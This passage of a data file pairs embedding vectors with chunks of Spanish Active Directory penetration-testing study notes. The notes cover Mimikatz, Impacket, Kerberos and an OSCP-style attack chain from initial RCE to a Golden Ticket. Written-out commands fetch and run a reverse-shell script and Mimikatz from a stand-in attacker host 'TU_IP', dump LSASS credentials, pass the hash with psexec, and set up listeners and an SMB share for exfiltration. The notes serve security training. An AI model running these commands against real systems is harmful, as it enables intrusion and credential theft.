-0.07316, 0.03309, 0.05693, -0.06672, -0.01869, -0.00125, 0.06237, -0.04097, 0.02021, -0.03053, -0.02386, 0.01331, -0.06253, -0.15816, -0.02363, -0.07129, -0.03441, -0.12181, 0.04684, 0.00575, -0.07044, -0.02987, 0.00344, -0.00215, -0.00715, -0.07027, 0.01966, 0.00795, 0.01468, 0.07641, 0.00096, 0.03746, 0.07637, 0.03524, 0.01072, -0.04075, -0.02597, 0.03117, -0.10079, 0.06408, 0.02328, -0.0256, 0.01882, 0.00074, -0.08118, 0.01673, -0.01606, 0.11033, 0.05281, -0.01931, 0.0248, -0.02752, -0.05348, -0.06207, -0.01502, 0.04349, 0.04786, 0.04059, 0.03986, 0.03792, 0.05612, -0.00909, -0.00662, 0.05741, 0.01281, 0.01052, 0.04901, 0.01281, -0.0046, 0.00949, 0.01285, -0.0794, -0.00215, -0.018, 0.03548, -0.01216, -0.06536, -0.07775, -0.01372, 0.04889, -0.02257, -0.01353, -0.03023, -0.05115, -0.0321, 0.02014, -0.00845, -0.06415, -0.03981, 0.02877, 0.04924, -0.08631, 0.00362, -0.05473]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la víctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesión está activa) y volcarlas.\n\n```\n tú (Kali) víctima Windows\n ───────── ────────────────\n │\n │ 1. Levantas HTTP en tu carpeta de herramientas\n │\n │ ┌────────────┐\n │ 2. desde │ PowerShell │ iwr http://kali/mimikatz.exe -o m.exe\n │ reverse │ shell │\n │ shell ──► └─────┬──────┘\n │ │\n │ ▼\n │ ┌────────────────┐\n │ │ m.exe │ privilege::debug\n │ │ │ sekurlsa::logonpasswords\n │ 4. ves ◄───┤ vuelca creds │ lsadump::sam\n │ hashes │ del LSASS │ lsadump::dcsync /user:Administrator\n │ └────────────────┘\n```", "v": [-0.24707, -0.03966, 0.02275, 0.02366, 0.0274, -0.17965, -0.14182, -0.04059, 0.05628, 0.01057, -0.18852, -0.0557, -0.03347, -0.05911, -0.01216, -0.03171, 0.00975, -0.04499, -0.0876, 0.03316, -0.01449, -0.00498, -0.13645, 0.00587, -0.00771, 0.0592, -0.05939, 0.05568, -0.0847, -0.0371, -0.08887, 0.08703, -0.21824, 0.0242, 0.01898, 0.05291, -0.16693, -0.01494, 0.04288, 0.28727, 0.03987, 0.12348, -0.14343, 0.10123, -0.03069, -0.1184, 0.06081, -0.00939, -0.00396, -0.13705, -0.05909, -0.07294, -0.02444, -0.03291, 0.05828, -0.02341, 0.13494, -0.10099, -0.04736, -0.1028, 0.04418, 0.06217, 0.00834, 0.00476, 0.04627, -0.0667, 0.15674, -0.10658, -0.0564, 0.06113, -0.1132, -0.0353, 0.01885, -0.10546, 0.04587, -0.1404, 0.06973, -0.06829, 0.03741, 0.04832, 0.01552, -0.12045, -0.11787, 0.02448, 0.02217, -0.10916, 0.03276, -0.0871, -0.02036, -0.00716, 0.0455, 0.04024, -0.02327, 0.07773, 0.01225, -0.08645, 0.01914, 0.00062, 0.05316, 0.03156, 0.08026, -0.03843, -0.04145, 0.05684, 0.08445, -0.02402, -0.0293, 0.04917, -0.0137, -0.0001, 0.09463, -0.01305, 0.02877, -0.06697, -0.05657, 0.03704, -0.07635, 0.0139, 0.05284, -0.00148, 0.00476, -0.06843, 0.00096, 0.02405, 0.01339, -0.08164, -0.03276, 0.09734, -0.0486, 0.02726, 0.03929, 0.04457, -0.03042, -0.03939, 0.02525, 0.08198, 0.10047, -0.00688, 0.03652, -0.00033, 0.04824, -0.05458, 0.05786, 0.03737, 0.07193, 0.08739, 0.04867, -0.04892, -0.04084, 0.01128, 0.08936, 0.0823, -0.00582, 0.01853, -0.02787, 0.01415, 0.03413, -0.01401, 0.00509, 0.00635, 0.00191, 0.07907, 0.02895, 0.05704, -0.04101, 0.00923, 0.00885, -0.01654, 0.07101, -0.01229, 0.00123, 0.00657, 0.01939, -0.00375, -0.00412, -0.06789, 0.03527, -0.02671, 0.03693, 0.00573, 0.00436, -0.02375, 0.02887, 0.02548, -0.0535, -0.0087, -0.05801, -0.01767, 0.01583, 0.01814, -0.02023, 0.00642, -0.02578, 0.00232, 0.02382, 0.00624, 0.00877, -0.00428, 0.04138, 0.03562, -0.03888, 0.04735, 0.02212, -0.05872, 0.06389, -0.00621, 0.00669, 0.01355, -0.01694, 0.01731, 0.06833, -0.00761, 0.06524, -0.04548, -0.05439, -0.03512, 0.03776, 0.0156, -0.00437, -0.02475, -0.01666, -0.0043, 0.08118, -0.00363, 0.00915, 0.03879, 0.01146, 0.00555, 0.00604, -0.03477, -0.02803, 0.03374, -0.01757, -0.07668, 0.03682, 0.02519, -0.04182, -0.02658, -0.02232, -0.06204, 0.01517, 0.03379, -0.0459, -0.09167, -0.06181, -0.02585, -0.06299, 0.03657, -0.00265, -0.01984, -0.02181, -0.01073, 0.02434, -0.05259, -0.02505, -0.05602]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos más útiles:\n\n```\nimpacket-psexec → te da shell en la víctima si tienes creds (estilo PsExec)\nimpacket-wmiexec → ejecutas comandos sin tocar disco\nimpacket-smbexec → otra forma de ejecución remota\nimpacket-secretsdump → vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs → ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers → ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT → forja/pide un TGT con cred conocida\nimpacket-getST → pide un service ticket\nimpacket-smbserver → monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx → relay attacks NTLM\n```", "v": [-0.17497, -0.26273, -0.20211, -0.10043, -0.00648, -0.23272, -0.04925, 0.03301, 0.00754, 0.13509, -0.19915, 0.01551, 0.09146, -0.08358, 0.0107, 0.06337, -0.08871, -0.03148, 0.14906, -0.01105, 0.04801, 0.06174, -0.06282, -0.05736, 0.08747, 0.19715, -0.013, 0.10993, -0.0822, 0.04295, 0.00368, -0.02859, -0.09404, -0.12927, 0.05144, -0.13711, -0.01862, -0.00386, 0.16644, 0.18137, 0.04102, 0.08292, -0.11364, 0.09266, -0.00952, -0.08676, 0.05617, 0.01778, 0.10178, -0.11898, 0.00665, -0.02894, -0.1814, -0.029, -0.03134, -0.04264, 0.1238, -0.00931, -0.04225, 0.07268, -0.02716, 0.07665, 0.00976, -0.00432, 0.10816, -0.06953, 0.04818, -0.07617, -0.08584, 0.02897, -0.11704, 0.0195, 0.09839, -0.04675, 0.01572, -0.05942, -0.01744, -0.02026, 0.09651, 0.11985, 0.02926, -0.02812, -0.05482, -0.01991, -0.09594, -0.09614, 0.0296, -0.0417, 0.01235, -0.03457, 0.09737, -0.02089, -0.05063, 0.08767, 0.05724, -0.04411, 0.01808, -0.03686, -0.00022, 0.00749, -0.00855, -0.03744, -0.06001, 0.05052, -0.08311, -0.03551, 0.01887, -0.00489, 0.03182, 0.02041, 0.11586, 0.04375, 0.01174, -0.00374, 0.00227, -0.07886, -0.01219, -0.06189, 0.02949, 1e-05, -0.02576, 0.00401, 0.03512, -0.00719, -0.02108, -0.04996, 0.00823, 0.02976, 0.01295, -0.0301, -0.01276, -0.00495, 0.03269, 0.01204, 0.04434, 0.00916, -0.04301, -0.03817, -0.02839, 0.00021, 0.05688, 0.03489, -0.01113, 0.10104, -0.0204, 0.03288, 0.03773, 0.0098, -0.04733, 0.02652, 0.14706, 0.02699, -0.0404, 0.01862, -0.00592, -0.03453, -0.01375, -0.03481, -0.03378, 0.02484, 0.02163, 0.00502, -0.0118, 0.04033, 0.02795, -0.02747, 0.02548, -0.03299, 0.03427, 0.00987, -0.0194, 0.02841, 0.03764, 0.00519, -0.01203, -0.07467, 0.04327, -0.04456, 0.01227, -0.05552, -0.04097, -0.01937, 0.01106, 0.02732, 0.01779, -0.04362, 0.03574, 0.0256, -0.05852, -0.06072, 0.01257, 0.02398, 0.0462, -0.05392, 0.01405, -0.00908, 0.02014, -0.01111, 0.00128, 0.04684, -0.04476, -0.01089, -0.03241, -0.07066, 0.03704, 0.01084, -0.03466, 0.04682, -0.03095, 0.06226, 0.06156, -0.01281, 0.02191, -0.06715, -0.05692, -0.02245, 0.0203, 0.05092, -0.00378, 0.0351, -0.04022, 0.00223, 0.0392, 0.0061, 0.00967, 0.01572, -0.02517, -0.02499, 0.04493, -0.01284, -0.01045, 0.04183, 0.00791, -0.00927, 0.01422, 0.0313, -0.00301, 0.0152, -0.03376, 0.01245, -0.01711, 0.00456, -0.01381, -0.06631, -0.01819, -0.00103, -0.06436, 0.02701, 0.00541, -0.02082, 0.02486, -0.03266, -0.05661, -0.02656, -0.01667, 0.05605]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Kerberos en 30 segundos\n\n```\n ┌──────────┐ ┌────────────────┐\n │ Usuario │ ¿Pwd? │ KDC (Domain │\n │ (cliente)│ ─────────────► │ Controller) │\n └────┬─────┘ └────┬───────────┘\n │ │\n │ ◄──── TGT (te identifica)│\n │ │\n │ TGT + \"quiero \\\\fileSrv\" │\n ├──────────────────────────►│\n │ │\n │ ◄──── TGS (para fileSrv)│\n │ │\n │ ┌───────────┐ │\n └──────────►│ fileServer│ \"este TGS prueba que soy yo\"\n └───────────┘\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un día\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS válido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "v": [-0.29745, -0.05006, 0.06427, 0.09898, 0.13775, -0.1942, -0.03025, 0.0387, 0.08864, 0.0142, -0.13083, -0.00228, 0.06891, -0.01503, -0.0509, -0.0467, 0.01175, -0.12744, -0.01881, 0.07005, 0.04877, -0.01772, -0.03501, -0.07968, -0.0011, -0.02008, -0.04567, -0.04735, -0.12202, 0.04947, -0.00961, -0.0178, -0.23514, -0.04938, -0.08067, 3e-05, -0.08513, 0.08777, -0.03509, 0.16079, 0.02995, -0.02783, -0.07622, 0.1541, -0.0648, -0.05177, 0.06609, 0.04514, -0.10925, -0.14017, -0.0724, -0.05815, 0.03898, -0.03181, -0.02154, -0.01139, 0.1358, -0.05409, -0.07897, -0.06733, 0.10273, -0.00607, -0.00683, 0.00111, -0.00676, -0.07637, 0.1005, -0.04593, -0.0472, -0.08896, -0.16505, -0.04124, 0.00073, -0.0996, 0.06679, -0.07707, 0.11726, -0.05108, 0.01361, 0.05226, -0.00414, -0.11588, -0.10919, -0.01731, 0.04211, -0.1303, 0.09186, -0.10002, -0.0543, 0.00821, 0.02303, 0.08826, -0.0049, 0.04876, -0.03022, -0.09111, 0.04599, -0.01328, 0.01872, -0.03122, 0.06994, 0.02548, -0.04362, -0.01845, 0.06901, -0.0113, 0.01006, 0.00092, 0.02537, 0.04339, 0.05022, -0.01648, 0.05207, -0.07039, -0.02909, 0.07227, -0.04499, 0.02649, 0.08199, 0.01641, -0.00434, -0.05792, 0.0214, 0.00136, 0.05216, -0.04847, -0.02484, 0.07507, -0.04595, 0.02162, 0.05609, 0.08498, -0.10167, -0.03052, 0.01256, 0.06815, 0.11095, 0.007, 0.04342, 0.0764, -0.00234, -0.05802, 0.06521, 0.01575, 0.12708, 0.07767, 0.03425, -0.07466, -0.06443, 0.0348, 0.03441, 0.09897, -0.01133, 0.00467, 0.02416, -0.00366, 0.05147, -0.09645, -0.0075, 0.01184, 0.00187, 0.09764, 0.05117, 0.05553, 0.00029, -0.00527, 0.01299, 0.00411, 0.04915, -0.04619, 0.00925, -0.018, 0.00597, 0.03954, -0.01519, -0.05792, 0.03374, -0.03823, 0.07955, -0.02179, 0.02075, -0.02564, -0.00746, 0.02211, -0.05462, -0.00685, -0.03887, -0.06276, 0.0884, -0.01388, 0.01994, 0.03413, -0.01397, -0.00244, -0.02584, -0.00428, 0.00472, 0.00171, 0.06297, 0.00874, -0.02867, 0.04071, 0.00028, -0.06341, 0.06345, -0.04805, 0.01367, 0.06995, -0.01512, 0.02763, 0.04772, -0.04096, 0.06683, -0.07971, -0.05913, -0.00166, -0.01226, 0.0068, 0.00177, -0.01788, -0.02181, 0.00821, 0.08066, 0.00627, 0.00075, 0.0234, 0.05769, -0.01291, 0.03791, -0.01602, -0.01483, 0.01518, 0.01109, -0.0685, 0.04353, 0.05188, -0.03482, -0.03185, -0.06643, -0.05843, 0.02806, 0.0413, -0.03718, -0.03447, -0.04287, -0.0436, -0.07652, 0.03411, 0.01293, -0.0433, -0.00227, -0.00624, 0.02064, -0.03273, 0.00747, -0.04714]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "## La cadena de ataque \"OSCP típica\" con esto", "v": [-0.06682, -0.10008, -0.06647, -0.09941, -0.07358, -0.17077, 0.11932, 0.05188, -0.00898, 0.1115, 0.12191, -0.01136, -0.09469, -0.02211, 0.01402, -0.0248, 0.02559, 0.08917, 0.1248, -0.14698, -0.13577, -0.05325, -0.04177, 0.00611, 0.08616, 0.06141, 0.00699, 0.04552, -0.10573, -0.12672, -0.04961, 0.07004, 0.05652, 0.0506, 0.03023, -0.02867, -0.17263, -0.10197, 0.03268, 0.12393, 0.01872, 0.0805, -0.09871, -0.02341, 0.13428, 0.01137, 0.04491, 0.1596, -0.04236, -0.10618, -0.09988, -0.05332, -0.1955, -0.04472, -0.00936, 0.01115, -0.01488, 0.03102, 0.02698, 0.06284, -0.01009, -0.00149, -0.01671, -0.17414, 0.05552, -0.0106, -0.10378, -0.01242, -0.09048, -0.10778, -0.00939, 0.09063, -0.1054, 0.06324, 0.15524, -0.00296, 0.12018, 0.09212, 0.20037, 0.10119, -0.01747, -0.08133, 0.10013, 0.01939, -0.03859, -0.06484, 0.04525, -0.03558, -0.10275, -0.07885, 0.09821, -0.02432, 0.0012, 0.00147, 0.0295, -0.08202, -0.01723, -0.07064, -0.01238, 0.00781, -0.03583, 0.06876, -0.06827, 0.07249, -0.01016, 0.01021, -0.00764, -0.03986, 0.06734, -0.01705, -0.00605, -0.01473, -0.0351, -0.04882, -0.08163, -0.01724, -0.03901, -0.01685, 0.04203, 0.02636, -0.08732, 0.09268, 0.0154, 0.03989, -0.02989, 0.00161, -0.05497, -0.01182, -0.02094, 0.05215, -0.11429, -0.02016, 0.08697, -0.04061, -0.06613, -0.00515, 0.00096, -0.08352, -0.04949, -0.04319, 0.04149, 0.04366, 0.00239, 0.00867, 0.0537, -0.02798, 0.02953, -0.11834, -0.10763, 0.07631, -0.02959, 0.07458, 0.03552, -0.06688, -0.03434, -0.03015, 0.00989, -0.06019, 0.01941, 0.11744, 0.09307, -0.0647, -0.0652, 0.09723, -0.02998, -0.03194, 0.00251, -0.01586, 0.04909, -0.00111, -0.02143, 0.07466, 0.01337, -0.01595, 0.06549, -0.02154, -0.06521, -0.04932, 0.04914, -0.01959, -0.05947, -0.03813, -0.04838, 0.01302, 0.03685, -0.01501, 0.00267, 0.04956, 0.00935, 0.02875, -0.02882, 0.00505, -0.01752, 0.01944, 0.01554, -0.03603, -0.02775, -0.01324, 0.01045, 0.03213, -0.02688, -0.03791, -0.01538, -0.03017, 0.03802, 0.01931, -0.01967, 0.0085, 0.00367, 0.07643, 0.01996, -0.07886, 0.07845, -0.01732, -0.0134, 0.02505, 0.04378, 0.03676, 0.02576, 0.02249, 0.01606, 0.01748, 0.04449, 0.04192, -0.02913, 0.00829, -0.01482, -0.01183, -0.00818, -0.0464, 0.00478, -0.04795, 0.00013, -0.03444, 0.02106, 0.01331, -0.03114, -0.01247, -0.08387, -0.015, -0.06515, -0.03234, -0.02189, -0.0039, -0.01521, -0.00467, -0.08282, -0.02502, -0.01954, -0.02204, 0.00529, 0.04559, -0.00679, -0.06719, -0.02083, -0.00628]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "```\n ┌─────────────────────────────────────────────────────────────────┐\n │ │\n │ 1) RCE inicial en una web ───────► reverse shell PowerShell │\n │ (sqli, file upload, etc.) en máquina USUARIO1 │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 2) WinPEAS desde tu carpeta ──► subes y ejecutas │\n │ enumera permisos, AlwaysInstallElevated, etc. │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 3) Local privesc ──► SYSTEM en USUARIO1 │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 4) Mimikatz ──► sekurlsa::logonpasswords │\n │ → hash NTLM de un usuario de dominio (DOMAIN\\juan) │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 5) BloodHound ──► \"¿juan es admin en algún sitio?\" │\n │ \"¿juan puede llegar a Domain Admin por algún camino?\" │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 │\n │ impacket-psexec -hashes :HASH 'juan@server2.local' │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 7) Si server2 = Domain Controller: │\n │ impacket-secretsdump ──► vuelcas TODA la BD del dominio │\n │ (NTDS.dit, krbtgt, etc.) │\n │ │\n │ │ │\n │ ▼ │\n │ │\n │ 8) Con hash de krbtgt: │\n │ impacket-ticketer ──► Golden Ticket → eres dios │\n │ │\n └─────────────────────────────────────────────────────────────────┘\n```", "v": [-0.25406, -0.04155, 0.08499, 0.05361, 0.03271, -0.16798, -0.07883, -0.03311, 0.02007, 0.01373, -0.12381, -0.03222, 0.01123, -0.05015, -0.07782, -0.03872, -0.01783, -0.0749, -0.07366, 0.06775, -0.02121, 0.04097, -0.10834, 0.00625, -0.01159, 0.00162, -0.07409, 0.05102, -0.12124, 0.03733, -0.02844, 0.08176, -0.2387, 0.05862, -0.05088, -0.05261, -0.07722, 0.00253, -0.02593, 0.24788, 0.015, 0.02876, -0.1276, 0.16762, -0.10608, -0.02047, 0.04977, 0.01755, -0.07078, -0.1701, -0.02628, -0.07729, -0.0163, -0.07949, 0.04535, 0.01571, 0.10649, -0.07875, -0.09941, -0.11418, 0.10249, 0.0453, 0.00015, -0.06163, -0.01662, -0.03341, 0.11324, -0.04709, 0.00368, -0.02969, -0.09183, -0.08564, 0.01072, -0.10774, 0.04219, -0.13189, 0.12444, -0.09156, 0.00961, 0.03112, 0.04857, -0.14987, -0.13033, 0.01069, 0.03952, -0.14569, 0.06848, -0.12316, -0.04197, 0.01225, 0.0208, -0.01146, -0.01007, 0.06723, -0.01579, -0.08924, 0.00915, -0.02557, -0.04924, 0.01335, 0.0765, 0.044, -0.02922, 0.00979, 0.10243, -0.02551, 0.01895, -0.01469, 0.05289, 0.02222, 0.08623, -0.01923, 0.021, -0.09996, -0.04643, 0.0774, -0.02313, 0.06121, 0.03405, 0.00748, -0.00379, -0.06541, 0.01285, 0.01279, 0.07156, -0.03828, 0.01138, 0.09863, -0.02209, 0.00163, 0.0353, 0.06211, -0.05373, -0.01998, 0.05075, 0.11445, 0.11401, -0.00202, 0.05331, 0.04692, 0.01374, -0.08575, 0.06088, 0.0565, 0.07878, 0.09556, 0.05486, -0.06796, -0.0476, 0.02752, 0.03525, 0.08133, -0.00525, 0.00082, 0.02797, 0.02647, 0.02903, -0.05234, -0.02407, -0.01942, 0.02977, 0.09906, 0.01207, 0.05625, -0.02677, 0.02919, 0.0523, 0.02346, 0.0657, -0.01368, -0.00876, -0.0022, 0.04871, 0.06651, -0.00755, -0.03539, 0.07592, -0.03261, 0.07881, -0.0034, 0.0143, -0.03227, 0.01966, 0.05917, -0.02272, 0.01436, -0.05201, -0.06107, 0.07819, -0.01625, -0.01546, 0.04203, 0.00652, 0.00801, 0.01415, 0.0096, 0.03861, -0.0065, 0.08181, 0.04434, -0.01726, 0.04243, -0.00019, -0.05528, 0.03899, -0.02019, 0.02079, 0.02433, -0.00464, 0.02994, 0.03171, -0.03418, 0.02802, -0.07026, -0.0525, 0.00534, 0.02171, -0.00174, -0.02643, -0.03502, -0.01694, 0.02945, 0.05822, 0.00797, 0.0253, 0.07439, 0.02371, 0.00478, 0.01301, -0.04259, 0.00065, 0.01113, -0.01838, -0.03928, 0.01241, 0.03727, -0.03196, -0.01692, -0.0167, -0.02178, 0.00604, 0.02882, 0.00155, -0.06096, -0.04242, -0.03281, -0.07197, 0.01812, -0.01853, -0.01331, -0.00114, -0.0029, 0.00953, -0.02019, -0.00334, -0.03792]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\n┌─ Terminal 1 (listener de shells) ─────────────────────────┐\n│ stty raw -echo; (stty size; cat) | nc -lvnp 4444 │\n└────────────────────────────────────────────────────────────┘\n\n┌─ Terminal 2 (HTTP para servir tus tools a la víctima) ────┐\n│ cd tu carpeta │\n│ python3 -m http.server 80 │\n└────────────────────────────────────────────────────────────┘\n\n┌─ Terminal 3 (SMB para que la víctima TE envíe ficheros) ──┐\n│ mkdir /tmp/loot && cd /tmp/loot │\n│ impacket-smbserver loot . -smb2support │\n└────────────────────────────────────────────────────────────┘\n\n┌─ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\n│ $ │\n└────────────────────────────────────────────────────────────┘\n```", "v": [-0.2348, -0.00934, 0.15043, 0.04313, 0.04221, -0.18344, -0.07709, -0.01843, 0.09615, 0.03752, -0.19961, -0.0017, 0.07391, -0.05121, -0.11408, -0.03164, -0.03601, -0.16222, -0.04172, 0.01846, 0.02393, 0.0291, -0.06559, -0.04695, 0.00084, 0.05846, -0.03842, 0.02032, -0.07973, 0.04343, -0.06634, 0.00522, -0.1973, 0.11495, -0.01745, -0.02579, -0.05318, -0.08206, -0.05979, 0.22423, -0.02865, -0.0161, -0.1264, 0.0972, -0.06003, -0.08135, 0.02369, 0.02341, -0.05063, -0.13246, -0.0669, -0.01941, 0.00694, 0.01073, -0.00425, 0.0168, 0.14593, -0.06958, 0.00922, -0.07904, 0.03063, 0.0324, 0.04124, 0.01573, 0.02927, -0.07688, 0.07349, -0.07385, -0.073, -0.04363, -0.11011, -0.05139, 0.04827, -0.11516, 0.04627, -0.06325, 0.04376, -0.09358, 0.00772, 0.0668, 0.00995, -0.11329, -0.10834, 0.00526, 0.00532, -0.17613, 0.08472, -0.04098, -0.02159, 0.00723, -0.00433, 0.04621, -0.02449, 0.06678, -0.04303, -0.0951, 0.06903, -0.03774, 0.06146, -0.10447, 0.09134, -0.03319, -0.02937, -0.05885, 0.06444, -0.03998, -0.01935, 0.05065, 0.04023, 0.03358, 0.06135, -0.04401, 0.115, -0.07845, -0.04383, 0.05304, -0.03431, 0.05176, 0.11642, -0.00065, -0.03754, -0.03927, -0.02515, 0.07592, 0.03725, -0.03777, 0.0233, 0.0844, 0.00206, 0.01344, 0.06618, 0.04167, -0.02916, -0.03897, -0.0042, 0.07767, 0.10134, -0.02739, 0.02898, 0.08797, -0.07755, -0.08261, 0.0128, 0.00819, 0.10692, 0.09434, 0.06019, -0.04871, -0.05032, -0.0198, 0.03013, 0.1184, -0.03988, -0.01876, -0.00521, 0.00272, 0.04202, -0.08677, -0.0413, 0.04925, 0.00167, 0.06452, 0.01819, 0.06796, -0.01484, 0.04775, 0.01838, 0.02, 0.03908, -0.03071, -0.01693, -0.01786, 0.03134, 0.03053, -0.03463, -0.05776, 0.03484, 0.02136, 0.07561, 0.0294, -0.00146, 0.00805, 0.03145, 0.01509, -0.0445, -0.03769, -0.07162, -0.04046, 0.04489, 0.00074, 0.02219, 0.04005, -0.07071, 0.05332, 0.00131, 0.007, 0.02657, 0.04607, 0.04119, 0.05562, 0.00782, 0.08674, 0.01961, -0.08636, 0.02292, -0.03542, -0.03965, 0.02187, -0.03397, 0.01053, 0.03851, -0.02752, 0.06734, -0.05318, -0.0341, -0.01516, 0.02344, 0.03534, 1e-05, -0.01896, -0.01139, -0.02453, 0.08108, -0.0304, 0.03697, 0.06022, 0.03009, -0.03601, 0.02671, -0.07049, 0.00489, 0.00248, 0.0034, -0.07968, 0.00685, 0.02386, -0.04585, -0.00733, -0.0271, -0.05662, 0.01844, 0.04423, -0.02432, -0.08363, -0.04593, -0.01428, -0.08725, 0.03197, -0.01723, 0.00236, -0.01372, 0.01712, 0.01735, -0.02068, -0.01662, -0.05081]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la víctima (por ejemplo SQLi → xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "v": [-0.07777, -0.14032, -0.11599, -0.01609, 0.08167, -0.23839, -0.00506, -0.19411, 0.11802, 0.07575, -0.05653, 0.00622, 0.03904, -0.09607, -0.04746, 0.04719, -0.16239, -0.09049, 0.0583, -0.05015, 0.04474, 0.10696, -0.25573, 0.02818, 0.01194, 0.1698, -0.13775, 0.04796, -0.05014, -0.21165, -0.07741, -0.18603, -0.08537, -0.0307, -0.11171, -0.08156, -0.08493, 0.1079, 0.05424, 0.15429, 0.052, 0.06057, -0.16913, 0.12238, 0.1508, -0.0192, 0.09292, -0.02713, 0.04757, -0.03333, -0.0717, -0.05766, -0.15284, -0.01895, 0.0068, -0.01875, 0.12282, -0.01721, 0.01972, -0.0049, -0.01785, 0.11279, -0.01325, 0.02804, 0.04655, -0.04463, 0.02816, -0.10314, -0.02746, 0.04628, -0.07418, -0.01927, -0.02983, -0.06495, 0.08628, -0.04927, 0.01896, -0.08189, 0.05153, 0.00632, -0.11478, -0.01848, -0.08399, -0.03662, -0.03356, -0.01734, 0.03008, -0.14959, 0.01438, -0.06511, 0.09944, -0.03414, 0.01171, 0.11556, 0.04345, -0.10483, -0.03366, 0.05618, -0.03779, -0.00115, -0.00429, 0.02496, -0.05355, 0.09318, 0.0768, 0.05094, -0.0062, 0.02894, -0.01002, 0.02692, 0.05465, 0.02289, 0.01113, -0.01537, -0.02125, -0.05494, -0.04332, -0.04248, 0.03021, -0.00355, -0.01389, -0.0127, 0.03076, 0.011, -0.02671, 0.01942, -0.05502, 0.08155, 0.00994, -0.02456, 0.03042, -0.0418, 0.04095, -0.04035, -0.00849, 0.03125, 0.01102, -0.00143, 0.012, -0.03675, 0.04716, 0.04951, 0.00321, -0.00087, 0.02134, 0.01086, 0.03424, -0.02555, -0.04497, 0.01553, 0.10725, -0.00316, 0.03939, 0.00558, -0.01972, -0.01055, 0.04236, -0.0115, -0.01511, -0.01206, -0.0165, -0.00742, 0.0199, 0.04649, 0.02047, -0.00204, -0.03116, 0.00378, 0.01907, -0.03631, 0.04305, -0.0084, 0.00033, -0.02538, -0.02659, -0.08859, 0.03337, -0.0252, -0.00141, -0.06676, 0.00518, -0.04427, 0.00376, 0.01727, -0.0732, -0.01365, 0.01423, -0.00557, -0.02789, -0.03355, 0.0385, 0.02115, 0.01452, -0.04856, 0.01302, -0.01195, 0.00236, -0.09258, 0.00012, -0.02124, -0.09178, 0.00827, -0.00955, -0.0488, 0.06852, -0.02673, -0.03911, 0.02125, -0.02714, -0.00852, 0.0122, 0.01558, 0.03858, 0.02422, -0.03171, -0.05029, 0.04272, 0.04187, -0.03525, 0.0361, -0.03874, -0.00372, 0.02128, -0.02271, 0.01392, 0.02008, 0.03284, 0.00186, 0.01926, -0.0171, 0.00227, 0.03141, -0.00544, -0.08712, 0.00537, -0.02984, -0.01836, -0.00389, -0.01497, -0.01999, 0.01488, 0.03285, -0.01099, -0.06406, -0.02903, -0.06662, -0.05372, 0.05858, 0.01023, -0.01274, -0.02216, -0.02674, -0.01726, -0.0643, -0.024, -0.00484]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "# Dentro de la shell, en la víctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseñas en claro (wdigest).", "v": [-0.03986, -0.04725, -0.13307, -0.10341, 0.02312, -0.11451, -0.25593, 0.12414, 0.07686, -0.01182, -0.00659, 0.05538, 0.04912, 0.02955, 0.01263, 0.00083, 0.08155, 0.01181, 0.08882, -0.06904, 0.05738, 0.02104, -0.1164, 0.02142, 0.07133, 0.0972, -0.06829, -0.00699, -0.10451, -0.03611, -0.05113, -0.02853, 0.01567, -0.06757, 0.04343, 0.07284, -0.05156, -0.00281, 0.09583, 0.21455, 